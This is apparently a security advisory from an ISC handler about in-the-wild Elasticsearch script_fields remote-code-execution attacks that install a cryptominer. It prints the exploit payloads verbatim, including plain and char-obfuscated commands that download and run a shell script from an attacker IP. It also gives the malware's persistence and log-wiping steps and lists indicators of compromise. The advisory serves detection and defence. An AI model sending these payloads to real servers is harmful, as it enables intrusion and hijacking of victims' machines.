We've seen the Elasticsearch being exploited using queries with script_fields for a while now, but we're seeing an increased activity. 

Attacks coming from 69.30.211.82 are trying to exploit this vulnerability, and executing shell commands. We've seen the following exploits in the wild:

• url /_search?pretty containing the payload and search query:
"size":1, "script_fields": {"lupin":{"script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"wget http://69.30.203.170/gLmwDU86r9pM3rXf/update.sh -P /tmp/sssooo\").getText()"}}}
• url /_search?pretty containing payload and search query:
{"size":1, "script_fields": {"lupin":{"script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"curl -fsSL http://69.30.203.170/gLmwDU86r9pM3rXf/update.sh |sh\").getText()"}}}
• url /_search?source containing payload and search query:
{"query": {"filtered": {"query": {"match_all": {}}}}, "script_fields": {"exp": {"script": "import java.util.*;\nimport java.io.*;\nString str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(new String[] {\"/bin/bash\",\"-c\",((char)119+(char)103+(char)101+(char)116+(char)32+(char)104+(char)116+(char)116+(char)112+(char)58+(char)47+(char)47+(char)54+(char)57+(char)46+(char)51+(char)48+(char)46+(char)50+(char)48+(char)51+(char)46+(char)49+(char)55+(char)48+(char)47+(char)103+(char)76+(char)109+(char)119+(char)68+(char)85+(char)56+(char)54+(char)114+(char)57+(char)112+(char)77+(char)51+(char)114+(char)88+(char)102+(char)47+(char)117+(char)112+(char)100+(char)97+(char)116+(char)101+(char)46+(char)115+(char)104+(char)32+(char)45+(char)80+(char)32+(char)47+(char)116+(char)109+(char)112+(char)47+(char)115+(char)115+(char)115+(char)111+(char)111+(char)111).toString() }).getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str+\"|\");}sb.toString();"}}, "size": 1}

Decoding the last exploit you'll get wget http://69.30.203.170/gLmwDU86r9pM3rXf/update.sh -P /tmp/sssooo. The name of the script_field lupin could be originating of one of  the initial exploits. The request is using the useragent python-requests/2.20.1.

The command will download and execute update.sh. This bash script will kill and disable other miners, creates persistence using cron, add its own ssh public key to the .authorized_keys file and downloads the devtool (xmrig) and the config.json. Devtool is actually a (variant of) xmrig, a CoinMiner. If update.sh runs as root, files will be installed in /etc, otherwise in the /tmp folder. Now it will start the miner and configure iptables to drop ports 3333,5555,7777 and 9999. Those ports are being seen often to be used with Miner pools. When finished it will clean logs to wipe out evidence.

The same server has been targeting vulnerable Huawei devices before (/ctrlt/DeviceUpgrade_1) while trying to execute a script (http://167.179.82.68/t.sh).

51.38.191.178

This host is also scanning for exploitable Elasticsearch instances (and also other vulnerable services). It tries to execute id to check if it returns the expected response.

• {"size":1, "script_fields": {"lupin":{"script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}

IOC

• ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAuna/E/UUQaGkVWuD613/07snQnMGFpOq3HlK9SNAEgXt3WwOPCHX6buuDTizo1dZFSbAK7ung0Ff4sYSN11hNeafySGivNBsRVnZGTJweUGOvXHuevIxlnEghaJ387SBNXEJwJUNLjoWbsTsYPF5GDt4RUJiLq2hVRyUQpxTX6G8MQWJ5t8A0WMGRzwxwNr7acS8NwNZ7PtedmGyXWGAnyg3CD3YT0kO+IaiX4i2mtLGNYxniHc/RK5Ba3r8LzuWvOlgXb9rGuCvGHKml+fYjQFUmGQse9Sfyqglm+rrQVQefphgEU0DG9JXvufmybc6XYqcNJfJnGIU8pz4p0QS0Q== root@s137446.wholesaleinternet.net" 
• 69.30.203.170
• 51.38.191.178
• 69.30.211.82

If you have any data, let me know. 

Remco Verhoef (@remco_verhoef)
ISC Handler – Founder of DutchSec
PGP Key